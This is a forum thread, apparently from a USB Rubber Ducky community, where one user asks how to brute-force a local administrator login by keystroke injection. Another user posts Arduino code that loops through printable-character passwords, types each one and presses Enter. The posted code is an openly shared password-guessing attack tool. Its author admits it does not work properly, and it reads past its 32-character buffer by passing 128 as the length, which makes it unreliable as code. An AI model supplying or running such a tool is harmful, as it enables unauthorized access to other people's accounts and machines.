Jump to content

[Version 1] Brute Forcing With The Ducky.


Jonny_Walked
 Share

Recommended Posts

Hey guys, I'm just wondering if I was able to make a code with Arduino to generate passwords, then use them to attempt to bruteforce an admin account locally. As in:

Generate password,

input "administrator" - (username)

tab,

input password value,

enter enter.

repeat until access is granted.

I am also considering using a wordlist, any links or even code on how to implement this would be great.

Thanks in advance.

Link to comment
Share on other sites

Even if the operating system does nothing to limit the speed of your guessing (which it easily can and certainly should), USB keyboards at 12 Mbit/sec are limited to 1000 state changes per second, due to the design of the HID protocol. Each keystroke is usually implemented as 2 events, a key down and key up.

Link to comment
Share on other sites

  • 3 weeks later...

I've been working on some code to do some brute forcing, but I can't seem to get it quite right. You're welcome to take a look at it, but if you fix it and get it working properly, I'd really appreciate it coming back to me.

// Simple Bruteforcer v0.1
// by HaDAk
// Special thanks to Kevin B. and Carl V.

  // Variables
  int ascii = 32; // 32 - 126
  int digit = 1;
  int blinkcount = 0;
  int MAX_PASSWORD = 32;
void setup() {

  // Blink when the ducky is first plugged in, to verify power to it.
  while(blinkcount < 2){
    blink(50);
    blinkcount++;
  }
  
  delay(1000); // wait a second
  hax(128);
}

void loop() {
  
}

void blink(int time){
  pinMode( PIN_D6, OUTPUT );    // set LED to super bright
  digitalWrite(PIN_D6, HIGH);   // LED on
  delay(time);                  // Slow blink
  digitalWrite(PIN_D6, LOW);    // LED off
  delay(time);
}

void enter(){ // Press the enter key, and release it
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void hax(int n){
    char curpw[MAX_PASSWORD];
    for(int i = 0; i < MAX_PASSWORD; ++i)
        curpw[i] = '\0';
    curpw[0] = 32;
    while(true)
    {
        try_password(curpw,n);
        curpw[0]++;
        char *test = &curpw[0];
        while (*test > (char)126)
        {
            if (curpw[MAX_PASSWORD-1] > (char)126)
            {
                return;
            }
            *test = 32;
            test++;
            (*test)++;
            if (*test < 32)
                *test = 32;
        }
    }    
}

void try_password(char* curpw, int n){
    for(int i=0;i<n;i++){
    Keyboard.print(curpw[i]);
  }
  delay(50);
  enter();
}

Link to comment
Share on other sites

  • 2 years later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...